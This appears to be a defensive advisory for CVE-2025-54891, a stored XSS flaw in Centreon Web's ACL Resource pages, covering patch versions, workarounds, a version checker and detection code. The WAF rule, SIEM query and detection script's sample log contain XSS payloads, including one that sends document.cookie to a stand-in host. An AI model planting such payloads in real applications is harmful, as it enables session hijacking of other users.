CVE-2025-54891

6.8 MEDIUM

📋 TL;DR

This stored cross-site scripting (XSS) vulnerability in Centreon Infra Monitoring (Centreon Web) lets an authenticated user who is allowed to edit ACL Resource access configuration save script content in those configuration fields. The payload is stored server-side and executes in the browser of every other user who later views the affected page, which is enough to hijack that user's session or perform actions with their privileges (typically an administrator's). Affected versions: Centreon Infra Monitoring 24.10.0-24.10.12, 24.04.0-24.04.17 and 23.10.0-23.10.27.

💻 Affected Systems

Products:
  • Centreon Infra Monitoring
Versions: 24.10.0-24.10.12, 24.04.0-24.04.17, 23.10.0-23.10.27
Operating Systems: All supported platforms
Default Config Vulnerable: ⚠️ Yes
Notes: Requires an authenticated user with rights to edit ACL Resource access configuration. The victim is any user who views the poisoned page, so the payload runs with the viewer's privileges, not the author's.


⚠️ Risk & Real-World Impact

🔴

Worst Case

A user with ACL editing rights plants a payload that hijacks an administrator's session (or captures credentials through an injected login prompt), uses that access to take full control of the Centreon instance, and pivots from the monitoring server into the hosts it monitors.

🟠

Likely Case

A user with ACL editing rights steals the session cookies of other administrators who view the ACL pages, then makes unauthorized configuration changes or exfiltrates sensitive monitoring data (host inventory, credentials stored in monitoring configuration) with their privileges.

🟢

If Mitigated

Limited impact: if ACL configuration editing is restricted to a small set of trusted administrators and the patched version's output encoding is in place, the payload has neither an author with the required rights nor a page on which it would execute.

🌐 Internet-Facing: MEDIUM - If the Centreon web interface is exposed to the internet, an attacker who has compromised one account with ACL editing rights can use this to reach other administrators' sessions.
🏢 Internal Only: HIGH - An internal user with ACL editing rights can use this to act as other administrators (privilege escalation) and keep a persistent foothold in the monitoring system, since the payload stays stored until it is removed.

🎯 Exploit Status

Public PoC: ✅ No
Weaponized: UNKNOWN
Unauthenticated Exploit: ✅ No
Complexity: MEDIUM

Requires authenticated privileged access to ACL configuration modules. Stored XSS payload persists until cleaned.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 24.10.13, 24.04.18, 23.10.28

Vendor Advisory: https://thewatch.centreon.com/latest-security-bulletins-64/cve-2025-54891-centreon-web-all-versions-medium-severity-5122

Restart Required: No

Instructions:

1. Back up your Centreon configuration and database.
2. Update to a patched version through the package manager (`dnf update centreon-web` / `yum update centreon-web` on RHEL-based systems, `apt-get install --only-upgrade centreon-web` on Debian-based systems) or by manual installation from the releases page.
3. Verify that the installed version matches the patched release for your branch.

🔧 Temporary Workarounds

Restrict ACL Configuration Access

Platform: all

Temporarily limit access to the ACL Resource configuration modules to the essential administrators only, and review existing ACL Resource entries for stored HTML or script content (the payload persists until it is removed).

# Review and modify user roles in the Centreon web interface under Configuration > Users > Contacts/Users

Implement WAF Rules

Platform: all

Deploy web application firewall rules that block XSS payloads sent to the ACL configuration parameters. Decode URL and HTML-entity encoding before matching, otherwise `%3Cscript` or `&#106;avascript:` slips past the rule.

# Example ModSecurity rule (configure the equivalent in your WAF solution):
SecRule ARGS "@rx <\s*script|javascript\s*:|\bon[a-z]+\s*=" \
    "id:1001,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:lowercase,msg:'XSS attempt'"
# Caveat: a single pattern rule is easy to bypass; enable the OWASP Core Rule Set XSS rules and treat the WAF as defence in depth until the patch is applied.

🧯 If You Can't Patch

  • Treat every ACL Resource configuration field as untrusted: audit the stored entries for HTML tags, `javascript:` URLs or `on*=` handlers and remove any you find, since the payload only needs one viewer to fire
  • Apply the principle of least privilege: restrict ACL configuration editing to the minimum necessary users, and have those users review ACL pages from a session without other sensitive privileges where possible

🔍 How to Verify

Check if Vulnerable:

Check Centreon web version via web interface (Administration > Parameters > Centreon UI) or command: rpm -qa | grep centreon-web

Check Version:

rpm -qa 2>/dev/null | grep centreon-web || dpkg -l 2>/dev/null | grep centreon-web

Verify Fix Applied:

Confirm that the installed version is 24.10.13, 24.04.18 or 23.10.28, or later on the same branch. Then confirm the fix behaves as expected: save a harmless marker such as `<b>probe</b>` in an ACL Resource name on a test instance, open the page as another user, and check that it renders as literal text rather than as bold; delete the test entry afterwards.
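The version ranges above are easy to misread by hand (24.04 is a different branch from 24.10, and package strings carry release suffixes). The following is an added example, not Centreon's own tooling: it parses the output of `rpm -qa | grep centreon-web` or `dpkg -l | grep centreon-web` and reports each installed centreon-web package as fixed, vulnerable, or unlisted. The fixed versions are the ones stated on this page; the assumption that every earlier release on a listed branch is affected follows from the affected ranges above, and branches not listed here are reported as "unlisted" rather than assumed safe. The sample package lines are constructed.

```python
import re
from typing import Optional

# Fixed versions as listed on this page, keyed by (major, minor) branch.
# Assumption: every release on a listed branch below the fixed version is
# affected; branches not in this table are reported as "unlisted", not "safe".
FIXED_IN = {
    (24, 10): (24, 10, 13),
    (24, 4): (24, 4, 18),
    (23, 10): (23, 10, 28),
}

# Matches both rpm -qa output ("centreon-web-24.10.5-1.el9.noarch") and
# dpkg -l output ("ii  centreon-web  24.04.18-1710  all  ...").
PKG_RE = re.compile(r"centreon-web[-\s]+(\d+(?:\.\d+){1,2})")


def parse_version(s: str) -> tuple:
    """'24.10.5-1.el9' -> (24, 10, 5); package release suffixes are dropped."""
    core = re.split(r"[-+~]", s.strip(), maxsplit=1)[0]
    return tuple(int(p) for p in core.split("."))


def status(version: str) -> str:
    """'fixed', 'vulnerable', or 'unlisted' (branch not covered by this page)."""
    v = parse_version(version)
    fixed = FIXED_IN.get(v[:2])
    if fixed is None:
        return "unlisted"
    return "fixed" if v >= fixed else "vulnerable"


def extract_version(pkg_line: str) -> Optional[str]:
    """Pull the version string out of one rpm -qa or dpkg -l line."""
    m = PKG_RE.search(pkg_line)
    return m.group(1) if m else None


def check_package_output(output: str) -> list:
    """Run over the captured text of the package-manager query; returns
    (version, status) per centreon-web line found."""
    results = []
    for line in output.splitlines():
        ver = extract_version(line)
        if ver:
            results.append((ver, status(ver)))
    return results


if __name__ == "__main__":
    # Constructed sample output; replace with the real command output.
    SAMPLE = (
        "centreon-web-24.10.5-1.el9.noarch\n"
        "ii  centreon-web  24.04.18-1710  all  Centreon web interface\n"
    )
    for ver, st in check_package_output(SAMPLE):
        print(ver, st)
```

Feed it the real output with `rpm -qa | grep centreon-web | python3 check.py` after replacing the constructed SAMPLE with `sys.stdin.read()`; an "unlisted" result means the branch is outside what this page documents and should be checked against the vendor advisory.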

📡 Detection & Monitoring

Log Indicators:

  • Unusual modifications to ACL configurations
  • Multiple failed login attempts followed by ACL access
  • Suspicious JavaScript in configuration audit logs

Network Indicators:

  • Unexpected outbound connections from administrators' workstations to unknown hosts shortly after they view ACL configuration pages (the payload runs in the viewer's browser, not on the Centreon server)
  • Traffic patterns suggesting data exfiltration

SIEM Query:

source="centreon.log" AND ("ACL" OR "configuration") AND ("<script" OR "javascript:" OR "onerror=" OR "onload=" OR "%3Cscript" OR "&#")
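A keyword query like the one above misses payloads that arrive URL-encoded or as HTML entities, and it cannot be run against entries that were stored before logging was in place. The following is an added example, not Centreon's code or log format: it decodes each logged field value before matching, flags the XSS indicators named in this section, and applies the same check to already-stored ACL Resource rows (the cleanup step under "If You Can't Patch"). The log line layout, the ACL_RESOURCE_UPDATE action name and the column names are constructed assumptions; adapt the split in `scan_log()` to the real audit log.

```python
import html
import re
from urllib.parse import unquote

# Constructed sample audit-log lines, not real Centreon output. The layout
# (timestamp, user, action, then key="value" fields) is an assumption.
SAMPLE_LOG = """\
2025-08-01T10:02:11Z admin ACL_RESOURCE_UPDATE name="Prod hosts" alias="prod"
2025-08-01T10:05:43Z jdoe ACL_RESOURCE_UPDATE name="<script>fetch('//x.example/c?'+document.cookie)</script>" alias="tmp"
2025-08-01T10:07:02Z jdoe ACL_RESOURCE_UPDATE name="%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E" alias="t2"
2025-08-01T10:09:15Z admin ACL_RESOURCE_UPDATE name="Linux &lt;servers&gt;" alias="lnx"
2025-08-01T10:11:30Z jdoe ACL_RESOURCE_UPDATE name="click" alias="&#106;avascript:alert(1)"
"""

# Indicators typical of stored XSS payloads: script tags, javascript: URLs,
# inline event handlers, and tags that commonly carry them.
XSS_PATTERNS = re.compile(
    r"<\s*script\b"
    r"|javascript\s*:"
    r"|\bon[a-z]+\s*="
    r"|<\s*(?:img|svg|iframe|object|embed)\b",
    re.IGNORECASE,
)

FIELD_RE = re.compile(r'(\w+)="([^"]*)"')


def normalize(value: str) -> str:
    """Undo URL- and HTML-entity encoding (bounded rounds) so that %3Cscript
    or &#106;avascript: are matched as the text the browser would see."""
    cur, prev = value, None
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, html.unescape(unquote(cur))
    return cur


def is_suspicious(value: str) -> bool:
    """True if the decoded value contains an XSS indicator."""
    return XSS_PATTERNS.search(normalize(value)) is not None


def scan_log(text: str) -> list:
    """One finding per ACL_RESOURCE field whose value looks like a payload."""
    findings = []
    for line in text.splitlines():
        if "ACL_RESOURCE" not in line:
            continue
        ts, user, action, rest = line.split(" ", 3)
        for field, value in FIELD_RE.findall(rest):
            if is_suspicious(value):
                findings.append({"ts": ts, "user": user, "action": action,
                                 "field": field, "value": normalize(value)})
    return findings


def scan_rows(rows: list) -> list:
    """Same check over already-stored entries, e.g. ACL Resource rows exported
    from the database (column names here are constructed, not Centreon's).
    Returns (row id, column) for every string column that looks like a payload."""
    return [(row.get("id"), col) for row in rows for col, val in row.items()
            if isinstance(val, str) and is_suspicious(val)]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['user']} {f['field']}={f['value']!r}")
    stored = [{"id": 1, "name": "Prod hosts"},
              {"id": 7, "name": "x", "alias": "<svg onload=alert(1)>"}]
    print(scan_rows(stored))
```

Note that plain angle brackets in a name such as `Linux &lt;servers&gt;` are not flagged; the patterns key on script, URL-scheme and event-handler constructs, which is what a WAF or SIEM rule should also key on. Tune the pattern list for local false positives (a field legitimately containing `on...=` text) before alerting on it.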
